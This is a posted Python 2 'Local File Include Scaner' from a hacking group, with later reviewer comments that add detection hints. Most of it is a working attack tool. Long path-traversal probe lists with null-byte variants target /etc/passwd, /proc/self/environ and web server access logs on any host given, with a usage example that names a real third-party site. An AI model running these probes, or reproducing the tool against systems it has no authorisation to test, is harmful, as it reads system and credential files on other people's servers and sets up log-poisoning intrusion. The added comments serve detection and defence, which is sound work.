Fi8sVrs

Local File Include Scaner


# Author: parkdream1
# Messenger: h3x4r
# (c) R00TW0RM - Private Community
# https://r00tw0rm.com/
# Local File Include Scaner
# Greets: To all members of r00tw0rm !!

Usage: h3x4r.py <Target IP> <Port> <Path>
Example: python h3x4r.py playerstage.sourceforge.net 80 index.php?src=

Information

-- Random User-Agent

-- Written in Python

Banner()

help.png

Not vulnerable

not.png

Vulnerable

vul.png

[*] Update Ver. 1.1

Menu Select

Screenshot-8.png

Added scan types: environ, logs

Screenshot-8.png

Screenshot-9.png

[Python] scan ver 1.1.py - Pastebin.com

#!/usr/bin/python
# Author: parkdream1
# Messenger: h3x4r
# (c) R00TW0RM - Private Community
# https://r00tw0rm.com/
# Local File Include Scaner Ver. 1.1
# Greets: To all members of r00tw0rm !!

import socket,sys,re,random,time,httplib
from random import choice

# Probe list used by scanpasswd(): "etc/passwd" reached through 0 to 13 "../"
# steps, first as written and then with a trailing "%00" (28 entries).
# "%00" is a URL-encoded NUL byte. It only matters to a back end that cuts a
# path off at NUL; PHP has refused NUL bytes in paths since 5.3.4, so on a
# current PHP stack the second half is expected to fail.
# For detection: every entry contains the literal "etc/passwd" and nothing is
# encoded apart from the "%00", so a substring rule on the request line
# covers the whole list.
passwd = ["/etc/passwd",
"../etc/passwd",
"../../etc/passwd",
"../../../etc/passwd",
"../../../../etc/passwd",
"../../../../../etc/passwd",
"../../../../../../etc/passwd",
"../../../../../../../etc/passwd",
"../../../../../../../../etc/passwd",
"../../../../../../../../../etc/passwd",
"../../../../../../../../../../etc/passwd",
"../../../../../../../../../../../etc/passwd",
"../../../../../../../../../../../../etc/passwd",
"../../../../../../../../../../../../../etc/passwd",
# Same 14 paths again, each with the NUL-byte suffix.
"/etc/passwd%00",
"../etc/passwd%00",
"../../etc/passwd%00",
"../../../etc/passwd%00",
"../../../../etc/passwd%00",
"../../../../../etc/passwd%00",
"../../../../../../etc/passwd%00",
"../../../../../../../etc/passwd%00",
"../../../../../../../../etc/passwd%00",
"../../../../../../../../../etc/passwd%00",
"../../../../../../../../../../etc/passwd%00",
"../../../../../../../../../../../etc/passwd%00",
"../../../../../../../../../../../../etc/passwd%00",
"../../../../../../../../../../../../../etc/passwd%00"]

# Probe list used by scanenviron(): "proc/self/environ" reached through 0 to
# 14 "../" steps, then the same 15 paths with a trailing "%00" (30 entries).
# /proc/self/environ is the environment of whichever process reads it; a
# response that echoes it shows the web server's own environment variables.
# For detection: the literal "proc/self/environ" appears unencoded in every
# request built from this list.
environ = ["/proc/self/environ",
"../proc/self/environ",
"../../proc/self/environ",
"../../../proc/self/environ",
"../../../../proc/self/environ",
"../../../../../proc/self/environ",
"../../../../../../proc/self/environ",
"../../../../../../../proc/self/environ",
"../../../../../../../../proc/self/environ",
"../../../../../../../../../proc/self/environ",
"../../../../../../../../../../proc/self/environ",
"../../../../../../../../../../../proc/self/environ",
"../../../../../../../../../../../../proc/self/environ",
"../../../../../../../../../../../../../proc/self/environ",
"../../../../../../../../../../../../../../proc/self/environ",
# Same 15 paths again, each with the NUL-byte suffix.
"/proc/self/environ%00",
"../proc/self/environ%00",
"../../proc/self/environ%00",
"../../../proc/self/environ%00",
"../../../../proc/self/environ%00",
"../../../../../proc/self/environ%00",
"../../../../../../proc/self/environ%00",
"../../../../../../../proc/self/environ%00",
"../../../../../../../../proc/self/environ%00",
"../../../../../../../../../proc/self/environ%00",
"../../../../../../../../../../proc/self/environ%00",
"../../../../../../../../../../../proc/self/environ%00",
"../../../../../../../../../../../../proc/self/environ%00",
"../../../../../../../../../../../../../proc/self/environ%00",
"../../../../../../../../../../../../../../proc/self/environ%00"]

# Probe list used by scanlogs(): six Apache access-log locations, each reached
# through 0 to 14 "../" steps, plain and then with a trailing "%00"
# (6 locations x 15 depths x 2 = 180 entries).
# For defenders: a hit on any of these means the account the web application
# runs as can read the server's access log through the include parameter.
# Denying that account read access to the log directory makes every entry
# here fail regardless of the include bug.

# Location 1: /usr/local/apache2/logs/access_log
logs = ["/usr/local/apache2/logs/access_log",
"../usr/local/apache2/logs/access_log",
"../../usr/local/apache2/logs/access_log",
"../../../usr/local/apache2/logs/access_log",
"../../../../usr/local/apache2/logs/access_log",
"../../../../../usr/local/apache2/logs/access_log",
"../../../../../../usr/local/apache2/logs/access_log",
"../../../../../../../usr/local/apache2/logs/access_log",
"../../../../../../../../usr/local/apache2/logs/access_log",
"../../../../../../../../../usr/local/apache2/logs/access_log",
"../../../../../../../../../../usr/local/apache2/logs/access_log",
"../../../../../../../../../../../usr/local/apache2/logs/access_log",
"../../../../../../../../../../../../usr/local/apache2/logs/access_log",
"../../../../../../../../../../../../../usr/local/apache2/logs/access_log",
"../../../../../../../../../../../../../../usr/local/apache2/logs/access_log",
"/usr/local/apache2/logs/access_log%00",
"../usr/local/apache2/logs/access_log%00",
"../../usr/local/apache2/logs/access_log%00",
"../../../usr/local/apache2/logs/access_log%00",
"../../../../usr/local/apache2/logs/access_log%00",
"../../../../../usr/local/apache2/logs/access_log%00",
"../../../../../../usr/local/apache2/logs/access_log%00",
"../../../../../../../usr/local/apache2/logs/access_log%00",
"../../../../../../../../usr/local/apache2/logs/access_log%00",
"../../../../../../../../../usr/local/apache2/logs/access_log%00",
"../../../../../../../../../../usr/local/apache2/logs/access_log%00",
"../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
"../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
"../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
"../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
# Location 2: /var/log/apache2/access.log
"/var/log/apache2/access.log",
"../var/log/apache2/access.log",
"../../var/log/apache2/access.log",
"../../../var/log/apache2/access.log",
"../../../../var/log/apache2/access.log",
"../../../../../var/log/apache2/access.log",
"../../../../../../var/log/apache2/access.log",
"../../../../../../../var/log/apache2/access.log",
"../../../../../../../../var/log/apache2/access.log",
"../../../../../../../../../var/log/apache2/access.log",
"../../../../../../../../../../var/log/apache2/access.log",
"../../../../../../../../../../../var/log/apache2/access.log",
"../../../../../../../../../../../../var/log/apache2/access.log",
"../../../../../../../../../../../../../var/log/apache2/access.log",
"../../../../../../../../../../../../../../var/log/apache2/access.log",
"/var/log/apache2/access.log%00",
"../var/log/apache2/access.log%00",
"../../var/log/apache2/access.log%00",
"../../../var/log/apache2/access.log%00",
"../../../../var/log/apache2/access.log%00",
"../../../../../var/log/apache2/access.log%00",
"../../../../../../var/log/apache2/access.log%00",
"../../../../../../../var/log/apache2/access.log%00",
"../../../../../../../../var/log/apache2/access.log%00",
"../../../../../../../../../var/log/apache2/access.log%00",
"../../../../../../../../../../var/log/apache2/access.log%00",
"../../../../../../../../../../../var/log/apache2/access.log%00",
"../../../../../../../../../../../../var/log/apache2/access.log%00",
"../../../../../../../../../../../../../var/log/apache2/access.log%00",
"../../../../../../../../../../../../../../var/log/apache2/access.log%00",
# Location 3: /var/log/httpd/access_log
"/var/log/httpd/access_log",
"../var/log/httpd/access_log",
"../../var/log/httpd/access_log",
"../../../var/log/httpd/access_log",
"../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/access_log",
"../../../../../../var/log/httpd/access_log",
"../../../../../../../var/log/httpd/access_log",
"../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../../../../../var/log/httpd/access_log",
"/var/log/httpd/access_log%00",
"../var/log/httpd/access_log%00",
"../../var/log/httpd/access_log%00",
"../../../var/log/httpd/access_log%00",
"../../../../var/log/httpd/access_log%00",
"../../../../../var/log/httpd/access_log%00",
"../../../../../../var/log/httpd/access_log%00",
"../../../../../../../var/log/httpd/access_log%00",
"../../../../../../../../var/log/httpd/access_log%00",
"../../../../../../../../../var/log/httpd/access_log%00",
"../../../../../../../../../../var/log/httpd/access_log%00",
"../../../../../../../../../../../var/log/httpd/access_log%00",
"../../../../../../../../../../../../var/log/httpd/access_log%00",
"../../../../../../../../../../../../../var/log/httpd/access_log%00",
"../../../../../../../../../../../../../../var/log/httpd/access_log%00",
# Location 4: /var/log/httpd-access.log
"/var/log/httpd-access.log",
"../var/log/httpd-access.log",
"../../var/log/httpd-access.log",
"../../../var/log/httpd-access.log",
"../../../../var/log/httpd-access.log",
"../../../../../var/log/httpd-access.log",
"../../../../../../var/log/httpd-access.log",
"../../../../../../../var/log/httpd-access.log",
"../../../../../../../../var/log/httpd-access.log",
"../../../../../../../../../var/log/httpd-access.log",
"../../../../../../../../../../var/log/httpd-access.log",
"../../../../../../../../../../../var/log/httpd-access.log",
"../../../../../../../../../../../../var/log/httpd-access.log",
"../../../../../../../../../../../../../var/log/httpd-access.log",
"../../../../../../../../../../../../../../var/log/httpd-access.log",
"/var/log/httpd-access.log%00",
"../var/log/httpd-access.log%00",
"../../var/log/httpd-access.log%00",
"../../../var/log/httpd-access.log%00",
"../../../../var/log/httpd-access.log%00",
"../../../../../var/log/httpd-access.log%00",
"../../../../../../var/log/httpd-access.log%00",
"../../../../../../../var/log/httpd-access.log%00",
"../../../../../../../../var/log/httpd-access.log%00",
"../../../../../../../../../var/log/httpd-access.log%00",
"../../../../../../../../../../var/log/httpd-access.log%00",
"../../../../../../../../../../../var/log/httpd-access.log%00",
"../../../../../../../../../../../../var/log/httpd-access.log%00",
"../../../../../../../../../../../../../var/log/httpd-access.log%00",
"../../../../../../../../../../../../../../var/log/httpd-access.log%00",
# Location 5: /var/www/logs/access_log
"/var/www/logs/access_log",
"../var/www/logs/access_log",
"../../var/www/logs/access_log",
"../../../var/www/logs/access_log",
"../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access_log",
"../../../../../../var/www/logs/access_log",
"../../../../../../../var/www/logs/access_log",
"../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../../../../../var/www/logs/access_log",
"/var/www/logs/access_log%00",
"../var/www/logs/access_log%00",
"../../var/www/logs/access_log%00",
"../../../var/www/logs/access_log%00",
"../../../../var/www/logs/access_log%00",
"../../../../../var/www/logs/access_log%00",
"../../../../../../var/www/logs/access_log%00",
"../../../../../../../var/www/logs/access_log%00",
"../../../../../../../../var/www/logs/access_log%00",
"../../../../../../../../../var/www/logs/access_log%00",
"../../../../../../../../../../var/www/logs/access_log%00",
"../../../../../../../../../../../var/www/logs/access_log%00",
"../../../../../../../../../../../../var/www/logs/access_log%00",
"../../../../../../../../../../../../../var/www/logs/access_log%00",
# NOTE(review): the next entry ends in "%0" where its siblings end in "%00";
# kept exactly as posted.
"../../../../../../../../../../../../../../var/www/logs/access_log%0",
# Location 6: /var/apache2/logs/access_log
"/var/apache2/logs/access_log",
"../var/apache2/logs/access_log",
"../../var/apache2/logs/access_log",
"../../../var/apache2/logs/access_log",
"../../../../var/apache2/logs/access_log",
"../../../../../var/apache2/logs/access_log",
"../../../../../../var/apache2/logs/access_log",
"../../../../../../../var/apache2/logs/access_log",
"../../../../../../../../var/apache2/logs/access_log",
"../../../../../../../../../var/apache2/logs/access_log",
"../../../../../../../../../../var/apache2/logs/access_log",
"../../../../../../../../../../../var/apache2/logs/access_log",
"../../../../../../../../../../../../var/apache2/logs/access_log",
"../../../../../../../../../../../../../var/apache2/logs/access_log",
"../../../../../../../../../../../../../../var/apache2/logs/access_log",
"/var/apache2/logs/access_log%00",
"../var/apache2/logs/access_log%00",
"../../var/apache2/logs/access_log%00",
"../../../var/apache2/logs/access_log%00",
"../../../../var/apache2/logs/access_log%00",
"../../../../../var/apache2/logs/access_log%00",
"../../../../../../var/apache2/logs/access_log%00",
"../../../../../../../var/apache2/logs/access_log%00",
"../../../../../../../../var/apache2/logs/access_log%00",
"../../../../../../../../../var/apache2/logs/access_log%00",
"../../../../../../../../../../var/apache2/logs/access_log%00",
"../../../../../../../../../../../var/apache2/logs/access_log%00",
"../../../../../../../../../../../../var/apache2/logs/access_log%00",
"../../../../../../../../../../../../../var/apache2/logs/access_log%00",
"../../../../../../../../../../../../../../var/apache2/logs/access_log%00"]

# Pool of ten hard-coded User-Agent strings (MSIE 9, Firefox 5 and Opera 11.11
# era). One is picked below and sent with every request.
# For detection: several strings are not ones a real browser sends. The first
# has a doubled ")" and "WIndows", and "Windows NT 9.0" / "Windows NT 7.1" are
# not Windows versions Microsoft shipped, so an exact match on them is a
# low-noise indicator for this script.
user = ['Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)',
'Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)',
'Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)',
'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11',
'Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11',
'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11']

# Chosen once when the module is loaded, not per request: every probe in a
# single run carries the same User-Agent.
agent = random.choice(user)

def scanpasswd():
    """Request path + each entry of ``passwd`` and stop at the first match.

    Reads the module-level ``target``, ``port``, ``path`` and ``agent``.
    Returns nothing; the process exits on the first match and on the first
    socket error, in both cases with status 1.

    What the run looks like from the server side: one new TCP connection per
    probe, a bare HTTP/1.0 GET with only Host and User-Agent headers, the
    same User-Agent throughout, an increasing "../" depth, and roughly one
    request per second while nothing matches.

    NOTE(review): the listing's indentation was lost on the page; the nesting
    below is reconstructed. time.sleep(1) is placed in the else branch, which
    behaves the same as placing it after the if/else because the if branch
    exits.
    """
    for lfi in passwd:
        try:
            r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            r.connect((target, port))
            # The request is assembled by string concatenation; path and lfi
            # go onto the request line unencoded.
            r.send("GET /"+path+lfi+" HTTP/1.0\r\n")
            r.send("Host: "+target+"\r\n")
            r.send("User-Agent: "+agent+"\r\n\r\n")
            print "[*] Send Request Success"
            print "http://"+target+"/"+path+lfi
            # Read until the server closes the connection (HTTP/1.0, no
            # keep-alive); no socket timeout is set.
            page = r.recv(1024)
            fullpage = ""
            while len(page):
                fullpage = fullpage + page
                page = r.recv(1024)
            r.close()
        except Exception, e:
            # Any error on any probe ends the whole run.
            print "[-] Cant Not Send Request"
            print e
            sys.exit(1)
        # Substring test over the raw response, headers included. A match
        # shows the root entry of a passwd-format file was echoed back; the
        # status code is not checked.
        r00t = re.search("root:x:0:0:",fullpage)
        if r00t:
            print "\033[32m[*] Request Vulnerability\n"
            sys.exit(1)
        else:
            print "[-] Request Is Not Vulnerability\n"
            time.sleep(1)

def scanenviron():
    """Request path + each entry of ``environ`` and stop at the first match.

    Same request loop as scanpasswd(); only the probe list and the marker
    string differ. Reads the module-level ``target``, ``port``, ``path`` and
    ``agent``. Exits with status 1 on the first match and on the first
    socket error.

    NOTE(review): the listing's indentation was lost on the page; the nesting
    below is reconstructed. time.sleep(1) is placed in the else branch, which
    behaves the same as placing it after the if/else because the if branch
    exits.
    """
    for lfi1 in environ:
        try:
            r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            r.connect((target, port))
            r.send("GET /"+path+lfi1+" HTTP/1.0\r\n")
            r.send("Host: "+target+"\r\n")
            r.send("User-Agent: "+agent+"\r\n\r\n")
            print "[*] Send Request Success"
            print "http://"+target+"/"+path+lfi1
            # Read until the server closes the connection; no timeout is set.
            page = r.recv(1024)
            fullpage = ""
            while len(page):
                fullpage = fullpage + page
                page = r.recv(1024)
            r.close()
        except Exception, e:
            # Any error on any probe ends the whole run.
            print "[-] Cant Not Send Request"
            print e
            sys.exit(1)
        # "HTTP_HOST" is a CGI-style variable name. The test is a substring
        # match on the whole response, so any page that prints server
        # variables for another reason (a debug or error dump, for example)
        # also matches: a hit needs manual confirmation.
        r00t = re.search("HTTP_HOST",fullpage)
        if r00t:
            print "\033[32m[*] Request Vulnerability\n"
            sys.exit(1)
        else:
            print "[-] Request Is Not Vulnerability\n"
            time.sleep(1)

def scanlogs():
    """Request path + each entry of ``logs`` and stop at the first match.

    Before the loop it issues one ``HEAD /`` through httplib, then uses the
    same request loop as scanpasswd() and looks for the text
    "HEAD / HTTP/1.1" in each response. Reads the module-level ``target``,
    ``port``, ``path`` and ``agent``. Exits with status 1 on the first match
    and on the first socket error.

    For detection: a ``HEAD /`` followed about a second apart by HTTP/1.0
    GETs whose query strings name access-log paths, all from one client, is
    the sequence this function produces.

    NOTE(review): the listing's indentation was lost on the page; the nesting
    below is reconstructed. time.sleep(1) is placed in the else branch, which
    behaves the same as placing it after the if/else because the if branch
    exits.
    """
    # No port is passed here, so httplib uses its default rather than the
    # ``port`` the probes below connect to. The response is never read and
    # conn is never closed. This call sits outside the try block, so an
    # error here surfaces as an uncaught exception.
    conn = httplib.HTTPConnection(target)
    conn.request("HEAD","/")
    for lfi2 in logs:
        try:
            r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            r.connect((target, port))
            r.send("GET /"+path+lfi2+" HTTP/1.0\r\n")
            r.send("Host: "+target+"\r\n")
            r.send("User-Agent: "+agent+"\r\n\r\n")
            print "[*] Send Request Success"
            print "http://"+target+"/"+path+lfi2
            # Read until the server closes the connection; no timeout is set.
            page = r.recv(1024)
            fullpage = ""
            while len(page):
                fullpage = fullpage + page
                page = r.recv(1024)
            r.close()
        except Exception, e:
            # Any error on any probe ends the whole run.
            print "[-] Cant Not Send Request"
            print e
            sys.exit(1)
        # The marker is the request line of a HEAD request as an access log
        # would record it. Any such line in the returned text matches, not
        # only the one sent above.
        r00t = re.search("HEAD / HTTP/1.1",fullpage)
        if r00t:
            print "\033[32m[*] Request Vulnerability\n"
            sys.exit(1)
        else:
            print "[-] Request Is Not Vulnerability\n"
            time.sleep(1)

def menu():
    """Print the four-item menu, read one choice and run the matching scan.

    Choices "1" to "3" call scanpasswd(), scanenviron() or scanlogs() and
    then exit; "4" exits directly. Every exit uses status 1, so the exit code
    does not tell a completed scan from an error. Any other input prints a
    message and calls menu() again, adding one stack frame per invalid
    attempt.

    NOTE(review): the listing's indentation was lost on the page; the nesting
    below is reconstructed. The final else is attached to the ``"4"`` test;
    because the earlier branches all exit, the result is the same as an
    if/elif chain.
    """
    print "Menu:\n"
    print "ID [1]"
    print "[Scan /etc/passwd File]\n"
    print "ID [2]"
    print "[Scan Environ File]\n"
    print "ID [3]"
    print "[Scan Access Logs File]\n"
    print "ID [4]"
    print "[Exit]\n"
    # raw_input is the Python 2 line reader; the value is compared as a
    # string and never evaluated.
    mess = raw_input("[*] Select ID For Start Scanner :")
    if mess == "1":
        print "Scan /etc/passwd File Starting ...\n"
        scanpasswd()
        sys.exit(1)
    if mess == "2":
        print "Scan /proc/self/environ File Starting ...\n"
        scanenviron()
        sys.exit(1)
    if mess == "3":
        print "Scan Access Logs File Starting ...\n"
        scanlogs()
        sys.exit(1)
    if mess == "4":
        print "Exiting..."
        sys.exit(1)
    else:
        print "Unknow Command\n"
        print "Please rechoice ID\n"
        menu()

def banner():
    """Print the start-up banner, including the target host and port.

    Reads the module-level ``target`` and ``port``; sends nothing over the
    network.
    """
    print "\n"
    print "****************************************************************************"
    print "|| Local File Include Scaner Ver. 1.1 ||"
    print "|| by parkdream1 ||"
    print "|| (c) R00TW0RM - Private Community ||"
    # port is an int at this point (converted in the entry block), hence str().
    print " Fucking from "+target+" on port "+str(port)
    print "****************************************************************************"
    print "\n"

# Entry point (Python 2). Expects exactly three arguments: host, port, and
# the URL path up to and including the parameter the probes are appended to.
# NOTE(review): the listing's indentation was lost on the page; the nesting
# below is reconstructed.
if __name__ == '__main__':
    if len(sys.argv) != 4:
        # Usage goes to stderr, the example line to stdout.
        print >>sys.stderr, "Usage:", sys.argv[0], "<Target IP> <Port> <Path>"
        print "Example: python", sys.argv[0], "playerstage.sourceforge.net 80 "+'"index.php?src="'
        sys.exit(1)

    # These become the module-level names the scan functions and banner()
    # read. int() raises ValueError on a non-numeric port and is not caught.
    # target and path are used as given, with no validation.
    target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]

    banner()
    menu()

source
